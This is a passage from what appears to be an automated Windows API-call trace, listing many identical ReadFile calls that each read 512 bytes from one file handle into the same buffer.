lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, 
lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: 
lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, 
lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.454] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.455] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.456] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.457] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.458] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 
[0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.459] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.460] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, 
lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.461] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: 
lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.462] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.463] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, 
